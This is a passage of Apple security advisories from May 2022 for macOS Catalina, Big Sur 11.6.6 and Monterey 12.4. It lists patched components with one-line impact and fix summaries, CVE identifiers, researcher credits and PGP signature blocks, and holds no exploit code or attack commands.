result in unexpected application termination or disclosure of process  
memory  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2022-26697: Qi Sun and Robert Ai of Trend Micro

AppleScript  
Available for: macOS Catalina  
Impact: Processing a maliciously crafted AppleScript binary may  
result in unexpected application termination or disclosure of process  
memory  
Description: An out-of-bounds read was addressed with improved bounds  
checking.  
CVE-2022-26698: Qi Sun of Trend Micro

CoreTypes  
Available for: macOS Catalina  
Impact: A malicious application may bypass Gatekeeper checks  
Description: This issue was addressed with improved checks to prevent  
unauthorized actions.  
CVE-2022-22663: Arsenii Kostromin (0x3c3e)

CVMS  
Available for: macOS Catalina  
Impact: A malicious application may be able to gain root privileges  
Description: A memory initialization issue was addressed.  
CVE-2022-26721: Yonghwi Jin (@jinmo123) of Theori  
CVE-2022-26722: Yonghwi Jin (@jinmo123) of Theori

DriverKit  
Available for: macOS Catalina  
Impact: A malicious application may be able to execute arbitrary code  
with system privileges  
Description: An out-of-bounds access issue was addressed with  
improved bounds checking.  
CVE-2022-26763: Linus Henze of Pinauten GmbH (pinauten.de)

Graphics Drivers  
Available for: macOS Catalina  
Impact: A local user may be able to read kernel memory  
Description: An out-of-bounds read issue existed that led to the  
disclosure of kernel memory. This was addressed with improved input  
validation.  
CVE-2022-22674: an anonymous researcher

Intel Graphics Driver  
Available for: macOS Catalina  
Impact: A malicious application may be able to execute arbitrary code  
with kernel privileges  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-26720: Liu Long of Ant Security Light-Year Lab

Intel Graphics Driver  
Available for: macOS Catalina  
Impact: A malicious application may be able to execute arbitrary code  
with kernel privileges  
Description: An out-of-bounds read issue was addressed with improved  
input validation.  
CVE-2022-26770: Liu Long of Ant Security Light-Year Lab

Intel Graphics Driver  
Available for: macOS Catalina  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-26756: Jack Dates of RET2 Systems, Inc

Intel Graphics Driver  
Available for: macOS Catalina  
Impact: A malicious application may be able to execute arbitrary code  
with kernel privileges  
Description: A memory corruption issue was addressed with improved  
input validation.  
CVE-2022-26769: Antonio Zekic (@antoniozekic)

Intel Graphics Driver  
Available for: macOS Catalina  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-26748: Jeonghoon Shin of Theori working with Trend Micro  
Zero Day Initiative

Kernel  
Available for: macOS Catalina  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2022-26714: Peter Nguyễn Vũ Hoàng (@peternguyen14) of STAR Labs  
(@starlabs_sg)

Kernel  
Available for: macOS Catalina  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-26757: Ned Williamson of Google Project Zero

libresolv  
Available for: macOS Catalina  
Impact: An attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: An integer overflow was addressed with improved input  
validation.  
CVE-2022-26775: Max Shavrick (@_mxms) of the Google Security Team

LibreSSL  
Available for: macOS Catalina  
Impact: Processing a maliciously crafted certificate may lead to a  
denial of service  
Description: A denial of service issue was addressed with improved  
input validation.  
CVE-2022-0778

libxml2  
Available for: macOS Catalina  
Impact: A remote attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-23308

OpenSSL  
Available for: macOS Catalina  
Impact: Processing a maliciously crafted certificate may lead to a  
denial of service  
Description: This issue was addressed with improved checks.  
CVE-2022-0778

PackageKit  
Available for: macOS Catalina  
Impact: A malicious application may be able to modify protected parts  
of the file system  
Description: This issue was addressed with improved entitlements.  
CVE-2022-26727: Mickey Jin (@patch1t)

Printing  
Available for: macOS Catalina  
Impact: A malicious application may be able to bypass Privacy  
preferences  
Description: This issue was addressed by removing the vulnerable  
code.  
CVE-2022-26746: @gorelics

Security  
Available for: macOS Catalina  
Impact: A malicious app may be able to bypass signature validation  
Description: A certificate parsing issue was addressed with improved  
checks.  
CVE-2022-26766: Linus Henze of Pinauten GmbH (pinauten.de)

SMB  
Available for: macOS Catalina  
Impact: An application may be able to gain elevated privileges  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-26715: Peter Nguyễn Vũ Hoàng of STAR Labs

SoftwareUpdate  
Available for: macOS Catalina  
Impact: A malicious application may be able to access restricted  
files  
Description: This issue was addressed with improved entitlements.  
CVE-2022-26728: Mickey Jin (@patch1t)

TCC  
Available for: macOS Catalina  
Impact: An app may be able to capture a user's screen  
Description: This issue was addressed with improved checks.  
CVE-2022-26726: an anonymous researcher

Tcl  
Available for: macOS Catalina  
Impact: A malicious application may be able to break out of its  
sandbox  
Description: This issue was addressed with improved environment  
sanitization.  
CVE-2022-26755: Arsenii Kostromin (0x3c3e)

WebKit  
Available for: macOS Catalina  
Impact: Processing a maliciously crafted mail message may lead to  
running arbitrary javascript  
Description: A validation issue was addressed with improved input  
sanitization.  
CVE-2022-22589: Heige of KnownSec 404 Team (knownsec.com) and Bo Qu  
of Palo Alto Networks (paloaltonetworks.com)

Wi-Fi  
Available for: macOS Catalina  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A memory corruption issue was addressed with improved  
memory handling.  
CVE-2022-26761: Wang Yu of Cyberserval

zip  
Available for: macOS Catalina  
Impact: Processing a maliciously crafted file may lead to a denial of  
service  
Description: A denial of service issue was addressed with improved  
state handling.  
CVE-2022-0530

zlib  
Available for: macOS Catalina  
Impact: An attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
input validation.  
CVE-2018-25032: Tavis Ormandy

zsh  
Available for: macOS Catalina  
Impact: A remote attacker may be able to cause arbitrary code  
execution  
Description: This issue was addressed by updating to zsh version  
5.8.1.  
CVE-2021-45444

Additional recognition

PackageKit  
We would like to acknowledge Mickey Jin (@patch1t) of Trend Micro for  
their assistance.

Security Update 2022-004 Catalina may be obtained from the Mac App  
Store or Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmKC1TYACgkQeC9qKD1p  
rhjgGRAAggg84uE4zYtBHmo5Qz45wlY/+FT7bSyCyo2Ta0m3JQmm26UiS9ZzXlD0  
58jCo/ti+gH/gqwU05SnaG88pSMT6VKaDDnmw8WcrPtbl6NN6JX8vaZLFLoGO0dB  
rjwap7ulcLe7/HM8kCz3qqjKj4fusxckCjmm5yBMtuMklq7i51vzkT/+ws00ALcH  
4S821CqIJlS2RIho/M/pih5A/H1Onw/nzKc7VOWjWMmmwoV+oiL4gMPE9kyIAJFQ  
NcZO7s70Qp9N5Z0VGIkD5HkAntEqYGNKJuCQUrHS0fHFUxVrQcuBbbSiv7vwnOT0  
NVcFKBQWJtfcqmtcDF8mVi2ocqUh7So6AXhZGZtL3CrVfNMgTcjq6y5XwzXMgwlm  
ezMX73MnV91QuGp6KVZEmoFNlJ2dhKcJ0fYAhhW9DJqvJ1u5xIkQrUkK/ERLnWpE  
9DIapT8uUbb9Zgez/tS9szv5jHhKtOoPbprju7d7LHw7XMFCVKbUvx745dFZx0AG  
PLsJZQNsQZJIK8QdcLA50KrlyjR2ts4nUsKj07I6LR4wUmcaj+goXYq4Nh4WLnoF  
x1AXD5ztdYlhqMcTAnuAbUYfuki0uzSy0p7wBiTknFwKMZNIaiToo64BES+7Iu1i  
vrB9SdtTSQCMXgPZX1Al1e2F/K2ubovrGU9geAEwLMq3AKudI4g=  
=JBHs  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-05-16-4

Apple Security Advisory 2022-05-16-3 - macOS Big Sur 11.6.6 addresses bypass, code execution, denial of service, out of bounds access, out of bounds read, out of bounds write, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-05-16-3 macOS Big Sur 11.6.6

macOS Big Sur 11.6.6 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213256.

apache  
Available for: macOS Big Sur  
Impact: Multiple issues in apache  
Description: Multiple issues were addressed by updating apache to  
version 2.4.53.  
CVE-2021-44224  
CVE-2021-44790  
CVE-2022-22719  
CVE-2022-22720  
CVE-2022-22721

AppKit  
Available for: macOS Big Sur  
Impact: A malicious application may be able to gain root privileges  
Description: A logic issue was addressed with improved validation.  
CVE-2022-22665: Lockheed Martin Red Team

AppleAVD  
Available for: macOS Big Sur  
Impact: An application may be able to execute arbitrary code with  
kernel privileges. Apple is aware of a report that this issue may  
have been actively exploited.  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-22675: an anonymous researcher

AppleGraphicsControl  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted image may lead to arbitrary  
code execution  
Description: A memory corruption issue was addressed with improved  
input validation.  
CVE-2022-26751: Michael DePlante (@izobashi) of Trend Micro Zero Day  
Initiative

AppleScript  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted AppleScript binary may  
result in unexpected application termination or disclosure of process  
memory  
Description: An out-of-bounds read issue was addressed with improved  
bounds checking.  
CVE-2022-26698: Qi Sun of Trend Micro

AppleScript  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted AppleScript binary may  
result in unexpected application termination or disclosure of process  
memory  
Description: An out-of-bounds read issue was addressed with improved  
input validation.  
CVE-2022-26697: Qi Sun and Robert Ai of Trend Micro

CoreTypes  
Available for: macOS Big Sur  
Impact: A malicious application may bypass Gatekeeper checks  
Description: This issue was addressed with improved checks to prevent  
unauthorized actions.  
CVE-2022-22663: Arsenii Kostromin (0x3c3e)

CVMS  
Available for: macOS Big Sur  
Impact: A malicious application may be able to gain root privileges  
Description: A memory initialization issue was addressed.  
CVE-2022-26721: Yonghwi Jin (@jinmo123) of Theori  
CVE-2022-26722: Yonghwi Jin (@jinmo123) of Theori

DriverKit  
Available for: macOS Big Sur  
Impact: A malicious application may be able to execute arbitrary code  
with system privileges  
Description: An out-of-bounds access issue was addressed with  
improved bounds checking.  
CVE-2022-26763: Linus Henze of Pinauten GmbH (pinauten.de)

Graphics Drivers  
Available for: macOS Big Sur  
Impact: A local user may be able to read kernel memory  
Description: An out-of-bounds read issue existed that led to the  
disclosure of kernel memory. This was addressed with improved input  
validation.  
CVE-2022-22674: an anonymous researcher

Intel Graphics Driver  
Available for: macOS Big Sur  
Impact: A malicious application may be able to execute arbitrary code  
with kernel privileges  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-26720: Liu Long of Ant Security Light-Year Lab

Intel Graphics Driver  
Available for: macOS Big Sur  
Impact: A malicious application may be able to execute arbitrary code  
with kernel privileges  
Description: An out-of-bounds read issue was addressed with improved  
input validation.  
CVE-2022-26770: Liu Long of Ant Security Light-Year Lab

Intel Graphics Driver  
Available for: macOS Big Sur  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-26756: Jack Dates of RET2 Systems, Inc

Intel Graphics Driver  
Available for: macOS Big Sur  
Impact: A malicious application may be able to execute arbitrary code  
with kernel privileges  
Description: A memory corruption issue was addressed with improved  
input validation.  
CVE-2022-26769: Antonio Zekic (@antoniozekic)

Intel Graphics Driver  
Available for: macOS Big Sur  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-26748: Jeonghoon Shin of Theori working with Trend Micro  
Zero Day Initiative

IOMobileFrameBuffer  
Available for: macOS Big Sur  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A memory corruption issue was addressed with improved  
state management.  
CVE-2022-26768: an anonymous researcher

Kernel  
Available for: macOS Big Sur  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2022-26714: Peter Nguyễn Vũ Hoàng (@peternguyen14) of STAR Labs  
(@starlabs_sg)

Kernel  
Available for: macOS Big Sur  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-26757: Ned Williamson of Google Project Zero

LaunchServices  
Available for: macOS Big Sur  
Impact: A malicious application may be able to bypass Privacy  
preferences  
Description: The issue was addressed with additional permissions  
checks.  
CVE-2022-26767: Wojciech Reguła (@_r3ggi) of SecuRing

LaunchServices  
Available for: macOS Big Sur  
Impact: A sandboxed process may be able to circumvent sandbox  
restrictions  
Description: An access issue was addressed with additional sandbox  
restrictions on third-party applications.  
CVE-2022-26706: Arsenii Kostromin (0x3c3e)

libresolv  
Available for: macOS Big Sur  
Impact: An attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: This issue was addressed with improved checks.  
CVE-2022-26776: Zubair Ashraf of Crowdstrike, Max Shavrick (@_mxms)  
of the Google Security Team

LibreSSL  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted certificate may lead to a  
denial of service  
Description: A denial of service issue was addressed with improved  
input validation.  
CVE-2022-0778

libxml2  
Available for: macOS Big Sur  
Impact: A remote attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-23308

OpenSSL  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted certificate may lead to a  
denial of service  
Description: This issue was addressed with improved checks.  
CVE-2022-0778

PackageKit  
Available for: macOS Big Sur  
Impact: A malicious application may be able to modify protected parts  
of the file system  
Description: This issue was addressed by removing the vulnerable  
code.  
CVE-2022-26712: Mickey Jin (@patch1t)

Printing  
Available for: macOS Big Sur  
Impact: A malicious application may be able to bypass Privacy  
preferences  
Description: This issue was addressed by removing the vulnerable  
code.  
CVE-2022-26746: @gorelics

Security  
Available for: macOS Big Sur  
Impact: A malicious app may be able to bypass signature validation  
Description: A certificate parsing issue was addressed with improved  
checks.  
CVE-2022-26766: Linus Henze of Pinauten GmbH (pinauten.de)

SMB  
Available for: macOS Big Sur  
Impact: An application may be able to gain elevated privileges  
Description: An out-of-bounds read issue was addressed with improved  
input validation.  
CVE-2022-26718: Peter Nguyễn Vũ Hoàng of STAR Labs

SMB  
Available for: macOS Big Sur  
Impact: Mounting a maliciously crafted Samba network share may lead  
to arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
input validation.  
CVE-2022-26723: Felix Poulin-Belanger

SMB  
Available for: macOS Big Sur  
Impact: An application may be able to gain elevated privileges  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-26715: Peter Nguyễn Vũ Hoàng of STAR Labs

SoftwareUpdate  
Available for: macOS Big Sur  
Impact: A malicious application may be able to access restricted  
files  
Description: This issue was addressed with improved entitlements.  
CVE-2022-26728: Mickey Jin (@patch1t)

TCC  
Available for: macOS Big Sur  
Impact: An app may be able to capture a user's screen  
Description: This issue was addressed with improved checks.  
CVE-2022-26726: an anonymous researcher

Tcl  
Available for: macOS Big Sur  
Impact: A malicious application may be able to break out of its  
sandbox  
Description: This issue was addressed with improved environment  
sanitization.  
CVE-2022-26755: Arsenii Kostromin (0x3c3e)

Vim  
Available for: macOS Big Sur  
Impact: Multiple issues in Vim  
Description: Multiple issues were addressed by updating Vim.  
CVE-2021-4136  
CVE-2021-4166  
CVE-2021-4173  
CVE-2021-4187  
CVE-2021-4192  
CVE-2021-4193  
CVE-2021-46059  
CVE-2022-0128

WebKit  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted mail message may lead to  
running arbitrary javascript  
Description: A validation issue was addressed with improved input  
sanitization.  
CVE-2022-22589: Heige of KnownSec 404 Team (knownsec.com) and Bo Qu  
of Palo Alto Networks (paloaltonetworks.com)

Wi-Fi  
Available for: macOS Big Sur  
Impact: A malicious application may disclose restricted memory  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2022-26745: an anonymous researcher

Wi-Fi  
Available for: macOS Big Sur  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A memory corruption issue was addressed with improved  
memory handling.  
CVE-2022-26761: Wang Yu of Cyberserval

zip  
Available for: macOS Big Sur  
Impact: Processing a maliciously crafted file may lead to a denial of  
service  
Description: A denial of service issue was addressed with improved  
state handling.  
CVE-2022-0530

zlib  
Available for: macOS Big Sur  
Impact: An attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
input validation.  
CVE-2018-25032: Tavis Ormandy

zsh  
Available for: macOS Big Sur  
Impact: A remote attacker may be able to cause arbitrary code  
execution  
Description: This issue was addressed by updating to zsh version  
5.8.1.  
CVE-2021-45444

Additional recognition

Bluetooth  
We would like to acknowledge Jann Horn of Project Zero for their  
assistance.

macOS Big Sur 11.6.6 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmKC1TUACgkQeC9qKD1p  
rhgJBg/9HpPp6P2OtFdYHigfaoga/3szMAjXC650MlC2rF1lXyTRVsO54eupz4er  
K8Iud3+YnDVTUKkadftWt2XdxAADGtfEFhJW584RtnWjeli+XtGEjQ8jD1/MNPJW  
qtnrOh2pYG9SxolKDofhiecbYxIGppRKSDRFl0/3VGFed2FIpiRDunlttHBEhHu/  
vZVSFzMrNbGvhju+ZCdwFLKXOgB851aRSeo9Xkt63tSGiee7rLmVAINyFbbPwcVP  
yXwMvn0TNodCBn0wBWD0+iQ3UXIDIYSPaM1Z0BQxVraEhK3Owro3JKgqNbWswMvj  
SY0KUulbAPs3aOeyz1BI70npYA3+Qwd+bk2hxbzbU/AxvxCrsEk04QfxLYqvj0mR  
VZYPcup2KAAkiTeekQ5X739r8NAyaaI+bp7FllFv/Z2jVW9kGgNIFr46R05MD9NF  
aC1JAZtJ4VWbMEGHnHAMrOgdGaHpryvzl2BjUXRgW27vIq5uF5YiNcpjS2BezTFc  
R2ojiMNRB33Y44LlH7Zv3gHm4bE3+NzcGeWvBzwOsHznk9Jiv6x2eBUxkttMlPyO  
zymQMONQN3bktSMT8JnmJ8rlEgISONd7NeTEzuhlGIWaWNAFmmBoPnBiPk+yC3n4  
d22yFs6DLp2pJ+0zOWmTcqt1xYng05Jwj4F0KT49w0TO9Up79+o=  
=rtPl  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-05-16-3

Apple Security Advisory 2022-05-16-2 - macOS Monterey 12.4 addresses buffer overflow, bypass, code execution, denial of service, integer overflow, out of bounds access, out of bounds read, out of bounds write, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-05-16-2 macOS Monterey 12.4

macOS Monterey 12.4 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213257.

AMD  
Available for: macOS Monterey  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A memory corruption issue was addressed with improved  
state management.  
CVE-2022-26772: an anonymous researcher

AMD  
Available for: macOS Monterey  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A buffer overflow issue was addressed with improved  
memory handling.  
CVE-2022-26741: ABC Research s.r.o  
CVE-2022-26742: ABC Research s.r.o  
CVE-2022-26749: ABC Research s.r.o  
CVE-2022-26750: ABC Research s.r.o  
CVE-2022-26752: ABC Research s.r.o  
CVE-2022-26753: ABC Research s.r.o  
CVE-2022-26754: ABC Research s.r.o

apache  
Available for: macOS Monterey  
Impact: Multiple issues in apache  
Description: Multiple issues were addressed by updating apache to  
version 2.4.53.  
CVE-2021-44224  
CVE-2021-44790  
CVE-2022-22719  
CVE-2022-22720  
CVE-2022-22721

AppleGraphicsControl  
Available for: macOS Monterey  
Impact: Processing a maliciously crafted image may lead to arbitrary  
code execution  
Description: A memory corruption issue was addressed with improved  
input validation.  
CVE-2022-26751: Michael DePlante (@izobashi) of Trend Micro Zero Day  
Initiative

AppleScript  
Available for: macOS Monterey  
Impact: Processing a maliciously crafted AppleScript binary may  
result in unexpected application termination or disclosure of process  
memory  
Description: An out-of-bounds read issue was addressed with improved  
input validation.  
CVE-2022-26697: Qi Sun and Robert Ai of Trend Micro

AppleScript  
Available for: macOS Monterey  
Impact: Processing a maliciously crafted AppleScript binary may  
result in unexpected application termination or disclosure of process  
memory  
Description: An out-of-bounds read issue was addressed with improved  
bounds checking.  
CVE-2022-26698: Qi Sun of Trend Micro

AVEVideoEncoder  
Available for: macOS Monterey  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-26736: an anonymous researcher  
CVE-2022-26737: an anonymous researcher  
CVE-2022-26738: an anonymous researcher  
CVE-2022-26739: an anonymous researcher  
CVE-2022-26740: an anonymous researcher

Contacts  
Available for: macOS Monterey  
Impact: A plug-in may be able to inherit the application's  
permissions and access user data  
Description: This issue was addressed with improved checks.  
CVE-2022-26694: Wojciech Reguła (@_r3ggi) of SecuRing

CVMS  
Available for: macOS Monterey  
Impact: A malicious application may be able to gain root privileges  
Description: A memory initialization issue was addressed.  
CVE-2022-26721: Yonghwi Jin (@jinmo123) of Theori  
CVE-2022-26722: Yonghwi Jin (@jinmo123) of Theori

DriverKit  
Available for: macOS Monterey  
Impact: A malicious application may be able to execute arbitrary code  
with system privileges  
Description: An out-of-bounds access issue was addressed with  
improved bounds checking.  
CVE-2022-26763: Linus Henze of Pinauten GmbH (pinauten.de)

ImageIO  
Available for: macOS Monterey  
Impact: A remote attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: An integer overflow issue was addressed with improved  
input validation.  
CVE-2022-26711: actae0n of Blacksun Hackers Club working with Trend  
Micro Zero Day Initiative

ImageIO  
Available for: macOS Monterey  
Impact: Photo location information may persist after it is removed  
with Preview Inspector  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-26725: Andrew Williams and Avi Drissman of Google

Intel Graphics Driver  
Available for: macOS Monterey  
Impact: A malicious application may be able to execute arbitrary code  
with kernel privileges  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-26720: Liu Long of Ant Security Light-Year Lab

Intel Graphics Driver  
Available for: macOS Monterey  
Impact: A malicious application may be able to execute arbitrary code  
with kernel privileges  
Description: A memory corruption issue was addressed with improved  
input validation.  
CVE-2022-26769: Antonio Zekic (@antoniozekic)

Intel Graphics Driver  
Available for: macOS Monterey  
Impact: A malicious application may be able to execute arbitrary code  
with kernel privileges  
Description: An out-of-bounds read issue was addressed with improved  
input validation.  
CVE-2022-26770: Liu Long of Ant Security Light-Year Lab

Intel Graphics Driver  
Available for: macOS Monterey  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-26748: Jeonghoon Shin of Theori working with Trend Micro  
Zero Day Initiative

Intel Graphics Driver  
Available for: macOS Monterey  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2022-26756: Jack Dates of RET2 Systems, Inc

IOKit  
Available for: macOS Monterey  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A race condition was addressed with improved locking.  
CVE-2022-26701: chenyuwang (@mzzzz__) of Tencent Security Xuanwu Lab

IOMobileFrameBuffer  
Available for: macOS Monterey  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A memory corruption issue was addressed with improved  
state management.  
CVE-2022-26768: an anonymous researcher

Kernel  
Available for: macOS Monterey  
Impact: An attacker that has already achieved code execution in macOS  
Recovery may be able to escalate to kernel privileges  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-26743: Jordy Zomer (@pwningsystems)

Kernel  
Available for: macOS Monterey  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2022-26714: Peter Nguyễn Vũ Hoàng (@peternguyen14) of STAR Labs  
(@starlabs_sg)

Kernel  
Available for: macOS Monterey  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-26757: Ned Williamson of Google Project Zero

Kernel  
Available for: macOS Monterey  
Impact: An attacker that has already achieved kernel code execution  
may be able to bypass kernel memory mitigations  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2022-26764: Linus Henze of Pinauten GmbH (pinauten.de)

Kernel  
Available for: macOS Monterey  
Impact: A malicious attacker with arbitrary read and write capability  
may be able to bypass Pointer Authentication  
Description: A race condition was addressed with improved state  
handling.  
CVE-2022-26765: Linus Henze of Pinauten GmbH (pinauten.de)

LaunchServices  
Available for: macOS Monterey  
Impact: A sandboxed process may be able to circumvent sandbox  
restrictions  
Description: An access issue was addressed with additional sandbox  
restrictions on third-party applications.  
CVE-2022-26706: Arsenii Kostromin (0x3c3e)

LaunchServices  
Available for: macOS Monterey  
Impact: A malicious application may be able to bypass Privacy  
preferences  
Description: The issue was addressed with additional permissions  
checks.  
CVE-2022-26767: Wojciech Reguła (@_r3ggi) of SecuRing

libresolv  
Available for: macOS Monterey  
Impact: An attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: This issue was addressed with improved checks.  
CVE-2022-26776: Zubair Ashraf of Crowdstrike, Max Shavrick (@_mxms)  
of the Google Security Team  
CVE-2022-26708: Max Shavrick (@_mxms) of the Google Security Team

libresolv  
Available for: macOS Monterey  
Impact: An attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: An integer overflow was addressed with improved input  
validation.  
CVE-2022-26775: Max Shavrick (@_mxms) of the Google Security Team

LibreSSL  
Available for: macOS Monterey  
Impact: Processing a maliciously crafted certificate may lead to a  
denial of service  
Description: A denial of service issue was addressed with improved  
input validation.  
CVE-2022-0778

libxml2  
Available for: macOS Monterey  
Impact: A remote attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: A use after free issue was addressed with improved  
memory management.  
CVE-2022-23308

OpenSSL  
Available for: macOS Monterey  
Impact: Processing a maliciously crafted certificate may lead to a  
denial of service  
Description: This issue was addressed with improved checks.  
CVE-2022-0778

PackageKit  
Available for: macOS Monterey  
Impact: A malicious application may be able to modify protected parts  
of the file system  
Description: This issue was addressed by removing the vulnerable  
code.  
CVE-2022-26712: Mickey Jin (@patch1t)

PackageKit  
Available for: macOS Monterey  
Impact: A malicious application may be able to modify protected parts  
of the file system  
Description: This issue was addressed with improved entitlements.  
CVE-2022-26727: Mickey Jin (@patch1t)

Preview  
Available for: macOS Monterey  
Impact: A plug-in may be able to inherit the application's  
permissions and access user data  
Description: This issue was addressed with improved checks.  
CVE-2022-26693: Wojciech Reguła (@_r3ggi) of SecuRing

Printing  
Available for: macOS Monterey  
Impact: A malicious application may be able to bypass Privacy  
preferences  
Description: This issue was addressed by removing the vulnerable  
code.  
CVE-2022-26746: @gorelics

Safari Private Browsing  
Available for: macOS Monterey  
Impact: A malicious website may be able to track users in Safari  
private browsing mode  
Description: A logic issue was addressed with improved state  
management.  
CVE-2022-26731: an anonymous researcher

Security  
Available for: macOS Monterey  
Impact: A malicious app may be able to bypass signature validation  
Description: A certificate parsing issue was addressed with improved  
checks.  
CVE-2022-26766: Linus Henze of Pinauten GmbH (pinauten.de)

SMB  
Available for: macOS Monterey  
Impact: An application may be able to gain elevated privileges  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
CVE-2022-26715: Peter Nguyễn Vũ Hoàng of STAR Labs

SMB  
Available for: macOS Monterey  
Impact: An application may be able to gain elevated privileges  
Description: An out-of-bounds read issue was addressed with improved  
input validation.  
CVE-2022-26718: Peter Nguyễn Vũ Hoàng of STAR Labs

SMB  
Available for: macOS Monterey  
Impact: Mounting a maliciously crafted Samba network share may lead  
to arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
input validation.  
CVE-2022-26723: Felix Poulin-Belanger

SoftwareUpdate  
Available for: macOS Monterey  
Impact: A malicious application may be able to access restricted  
files  
Description: This issue was addressed with improved entitlements.  
CVE-2022-26728: Mickey Jin (@patch1t)

Spotlight  
Available for: macOS Monterey  
Impact: An app may be able to gain elevated privileges  
Description: A validation issue existed in the handling of symlinks  
and was addressed with improved validation of symlinks.  
CVE-2022-26704: an anonymous researcher

TCC  
Available for: macOS Monterey  
Impact: An app may be able to capture a user's screen  
Description: This issue was addressed with improved checks.  
CVE-2022-26726: an anonymous researcher

Tcl  
Available for: macOS Monterey  
Impact: A malicious application may be able to break out of its  
sandbox  
Description: This issue was addressed with improved environment  
sanitization.  
CVE-2022-26755: Arsenii Kostromin (0x3c3e)

WebKit  
Available for: macOS Monterey  
Impact: Processing maliciously crafted web content may lead to code  
execution  
Description: A memory corruption issue was addressed with improved  
state management.  
WebKit Bugzilla: 238178  
CVE-2022-26700: ryuzaki

WebKit  
Available for: macOS Monterey  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A use after free issue was addressed with improved  
memory management.  
WebKit Bugzilla: 236950  
CVE-2022-26709: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua  
wingtecher lab  
WebKit Bugzilla: 237475  
CVE-2022-26710: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua  
wingtecher lab  
WebKit Bugzilla: 238171  
CVE-2022-26717: Jeonghoon Shin of Theori

WebKit  
